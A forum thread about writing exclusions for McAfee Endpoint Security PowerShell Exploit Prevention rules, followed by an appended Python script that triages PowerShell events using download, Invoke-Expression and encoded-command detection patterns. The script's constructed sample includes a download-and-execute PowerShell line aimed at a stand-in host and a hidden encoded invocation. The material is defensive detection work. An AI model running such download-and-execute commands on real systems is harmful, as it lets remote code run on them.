Rhaya
Level 7
Message 1 of 5

How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention


Hello,

I need help.

We nearly got into a "MVISION Insights: UNC2447 Exploits SonicWall VPN Zero-Day" (KB94756) situation.

Our company is probably on the attack list already (this information is from the Mandiant researcher). Fortunately, there have been no attacks on our company yet.

So we decided to set the Exploit Prevention rules below to Block to mitigate the risk.

Endpoint Security - Exploit Prevention:

Rule ID: 6135 Unmanaged Powershell Detected
Rule ID: 6086 Powershell Command Restriction - Command
Rule ID: 6073 Execution Policy Bypass in Powershell
Rule ID: 6085 Powershell Command Restriction - File
Rule ID: 6127 Suspicious LSASS Access from Powershell
 
We understand this change will cause lots of events, so I want to add some exclusions for these events.
If there are any other suggestions about KB94756, I would be very glad to hear them.
Thanks for your help.
 
Example for Threat Event Log No 1
 
Threat Source User Name:NT AUTHORITY\SYSTEM
Threat Source Process Name:Stxhd.HostAgents.HAService.exe
Threat Target Process Name:System.Management.Automation.ni.dll
Threat Target File Path:C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0af5dea397ab3b443f2a1df9e60e2302\System.Management.Automation.ni.dll
Event Category:'Process' class or access
Event ID:18060
Threat Severity:Critical
Threat Name:Unmanaged Powershell Detected
Threat Type:Exploit Prevention
Action Taken:Blocked
Threat Handled:TRUE
Analyzer Detection Method:Exploit Prevention
Event Description:Exploit Prevention Files/Process/Registry violation detected
Module Name:Threat Prevention
Analyzer Content Version:10.6.0.11855
Analyzer Rule ID:6135
Analyzer Rule Name:Unmanaged Powershell Detected
Source Process Hash:053f45366f9ff84db49c5e78a4ee7e9e
Source Process Signed:No
Source File Path:C:\Program Files\Amazon\StxHD\HostAgents\HostedApplicationService
Source File Size (Bytes):104448
Source Description:"C:\Program Files\Amazon\StxHD\HostAgents\HostedApplicationService\Stxhd.HostAgents.HAService.exe"
Target Hash:e1cc8fe9cdee7d837d67431063b4ef65
Target Signed:No
Target Name:System.Management.Automation.ni.dll
Target Path:C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0af5dea397ab3b443f2a1df9e60e2302
Target File Size (Bytes):34348544
Description:NT AUTHORITY\SYSTEM ran C:\Program Files\Amazon\StxHD\HostAgents\HostedApplicationService\Stxhd.HostAgents.HAService.exe, which tried to access the process System.Management.Automation.ni.dll, violating the rule "Unmanaged Powershell Detected", and was blocked. For information on how to respond to this event, see KB85494.
Duration Before Detection (Days):>7 days
Attack Vector Type:Local System
Access Requested:Create
Exclusion that I created:
 
Exclusion type : File - Process - Registry
Name : System.Management.Automation.ni.dll
File name or path : *\System.Management.Automation.ni.dll
 
 
 
Example for Threat Event Log No 2
 
Threat Target Process Name:POWERSHELL.EXE
Threat Target File Path:C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Event Category:Host intrusion buffer overflow
Event ID:18054
Threat Severity:Critical
Threat Name:ExP:Illegal API Use
Threat Type:Exploit Prevention
Action Taken:Blocked
Threat Handled:TRUE
Analyzer Detection Method:Exploit Prevention
Event Description:An exploit was attempted and blocked
Module Name:Threat Prevention
Analyzer Content Version:10.6.0.11787
Analyzer Rule ID:6086
Analyzer Rule Name:Powershell Command Restriction - Command
Source Description:powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
Target Hash:04029e121a0cfa5991749937dd22a1d9
Target Signed:Yes
Target Signer:CN=MICROSOFT WINDOWS, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Target Parent Process Signed:Yes
Target Parent Process Signer:C=US, S=WASHINGTON, L=REDMOND, O=MICROSOFT CORPORATION, CN=MICROSOFT WINDOWS
Target Parent Process Name:COMPATTELRUNNER.EXE
Target Parent Process Hash:cb6ca75c8de515340514d54dd2eb0e64
Target Name:POWERSHELL.EXE
Target Path:C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0
Target File Size (Bytes):452608
API Name:AtlComPtrAssign
First Action Status:Not available
Second Action Status:Not available
Description:ExP:Illegal API Use Blocked an attempt to exploit C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE, which targeted the AtlComPtrAssign API.
Attack Vector Type:Local System
Exclusion that I created:
 
Exclusion type : Illegal API use - buffer overflow
Name : POWERSHELL.EXE
File name or path : C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
API name : AtlComPtrAssign
 

Accepted Solutions

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention


Unfortunately, this isn't always easy to manage in the UI, and sometimes it is impossible. I would just rewrite the rules and add your exclusions as follows:

Rule {
	Process {
		Include OBJECT_NAME { -v "**" }
		Exclude OBJECT_NAME {
			-v "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
			-v "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe"
			-v "C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"
			-v "C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell_ise.exe"
			-v "C:\\Program Files\\Amazon\\StxHD\\HostAgents\\HostedApplicationService\\Stxhd.HostAgents.HAService.exe"
		}
	}
	Target {
		Match SECTION {
			Include OBJECT_NAME {
				-v "System.Management.Automation.ni.dll"
				-v "System.Management.Automation.dll"
			}
			Include -access "CREATE"
		}
	}
}

 

Rule {
	Process {
		Include OBJECT_NAME { -v "**" }
	}
	Target {
		Match PROCESS {
			Include OBJECT_NAME {
				-v "powershell.exe"
				-v "pwsh.exe"
			}
			Include PROCESS_CMD_LINE { -v "**-command**" }
			Exclude PROCESS_CMD_LINE {
				-v "**-Command Write-Host 'Final result: 1';**"
			}
			Include -access "CREATE"
		}
	}
}

 


4 Replies


Rhaya
Level 7
Message 3 of 5

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention

@Daveb3d
Thanks for reply.
I very much appreciate the rules, and I will do some tests.
If there is any progress, I will post it as soon as I can.
Rhaya
Level 7
Message 4 of 5

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention


P.S.

After searching the threat events, we found out that there are a lot of different command options for powershell.exe in our environment. It's almost impossible to create one rule to achieve the goal, so we didn't use the rule below. Instead, we set the original rules 6086, 6073, 6085 and 6127 to report only.

 

Rule {
	Process {
		Include OBJECT_NAME { -v "**" }
	}
	Target {
		Match PROCESS {
			Include OBJECT_NAME {
				-v "powershell.exe"
				-v "pwsh.exe"
			}
			Include PROCESS_CMD_LINE { -v "**-command**" }
			Exclude PROCESS_CMD_LINE {
				-v "**-Command Write-Host 'Final result: 1';**"
			}
			Include -access "CREATE"
		}
	}
}

 

Re: How to configure the exclusion for Endpoint Security Threat Prevention > Exploit Prevention


I tend to agree.  I might focus more on the following:

1) Download related strings (e.g. *download*, *IWR*, etc)

2) Invoke-expression

3) Encoded commands.  

Dave

PS.  Thanks for the accepted solution.  Upgraded me to MVP on here. 😄
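Added example, not part of the thread and not McAfee's code: a Python triage script for the situation described above (a report-only rule set generating many PowerShell events, and the advice to focus on download strings, Invoke-Expression and encoded commands). It parses the "Key:Value" event export format seen in the original post, decodes any -EncodedCommand payload (base64 over UTF-16LE, as powershell.exe expects it), flags each command line with the three categories Dave lists, and groups the unflagged events by rule and process so they can be reviewed for a report-only setting or an exclusion. Events 1 and 2 in the sample reuse fields from the posted logs; events 3 and 4, the parent process names in them and the `host.invalid` URL are constructed for the test and are not from the thread.

```python
import base64
import re
from collections import Counter

# Constructed payload for the encoded-command sample: powershell.exe expects
# -EncodedCommand arguments as base64 over UTF-16LE text.
CONSTRUCTED_ENC = base64.b64encode("Write-Host 'constructed'".encode("utf-16le")).decode("ascii")

# Constructed export of four blank-line separated events in the "Key:Value"
# line format shown in the thread. Events 1 and 2 copy fields from the posted
# logs; events 3 and 4 are made up to exercise the classifier.
SAMPLE_EVENTS = f"""Threat Source Process Name:Stxhd.HostAgents.HAService.exe
Analyzer Rule ID:6135
Analyzer Rule Name:Unmanaged Powershell Detected
Source Description:"C:\\Program Files\\Amazon\\StxHD\\HostAgents\\HostedApplicationService\\Stxhd.HostAgents.HAService.exe"

Target Name:POWERSHELL.EXE
Target Parent Process Name:COMPATTELRUNNER.EXE
Analyzer Rule ID:6086
Analyzer Rule Name:Powershell Command Restriction - Command
Source Description:powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';

Target Name:POWERSHELL.EXE
Target Parent Process Name:WINWORD.EXE
Analyzer Rule ID:6086
Source Description:powershell.exe -nop -w hidden -enc {CONSTRUCTED_ENC}

Target Name:POWERSHELL.EXE
Target Parent Process Name:CMD.EXE
Analyzer Rule ID:6086
Source Description:powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString('http://host.invalid/a.ps1')"
"""

# powershell.exe accepts -e, -ec, -enc ... -EncodedCommand; "-ex..." (ExecutionPolicy)
# must not match, so only "c" or an "n..." tail is allowed after "-e".
ENCODED_RE = re.compile(r"(?<![\w-])-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"download|\biwr\b|invoke-webrequest|invoke-restmethod|net\.webclient|bitstransfer|\bwget\b|\bcurl\b",
    re.IGNORECASE)
IEX_RE = re.compile(r"\biex\b|invoke-expression", re.IGNORECASE)


def parse_events(text):
    """Split an export into events (blank-line separated) of Key:Value fields.
    Only the first colon separates key from value, so drive letters survive."""
    events, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                events.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        events.append(current)
    return events


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if there is none or it is not valid base64/UTF-16LE."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Flag a PowerShell command line with the three categories from the thread,
    scanning the decoded payload as well when the command is base64-encoded."""
    flags = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        flags.add("encoded")
    text = cmdline + " " + (decoded or "")
    if DOWNLOAD_RE.search(text):
        flags.add("download")
    if IEX_RE.search(text):
        flags.add("invoke-expression")
    return flags


def triage(text):
    """One row per event: rule id, process, parent, sorted flags and decoded payload (if any)."""
    rows = []
    for ev in parse_events(text):
        cmd = ev.get("Source Description", "")
        rows.append({
            "rule": ev.get("Analyzer Rule ID", "?"),
            "process": ev.get("Target Name") or ev.get("Threat Source Process Name", "?"),
            "parent": ev.get("Target Parent Process Name", ""),
            "flags": sorted(classify(cmd)),
            "decoded": decode_encoded_command(cmd),
        })
    return rows


def exclusion_candidates(text):
    """Events whose command line raised no flag, counted by (rule, process):
    the ones to review for a report-only setting or an exclusion."""
    return Counter((r["rule"], r["process"]) for r in triage(text) if not r["flags"])


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row["rule"], row["process"], row["parent"], row["flags"], row["decoded"])
    print("review for report-only/exclusion:", dict(exclusion_candidates(SAMPLE_EVENTS)))
```

In the sample, the HAService.exe event (rule 6135) and the `Write-Host 'Final result: 1'` event (rule 6086) come out unflagged and are grouped as exclusion candidates, while the encoded and the download-plus-IEX command lines keep their flags; on a real export the flagged rows are the ones worth reading in full before any exclusion is written.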
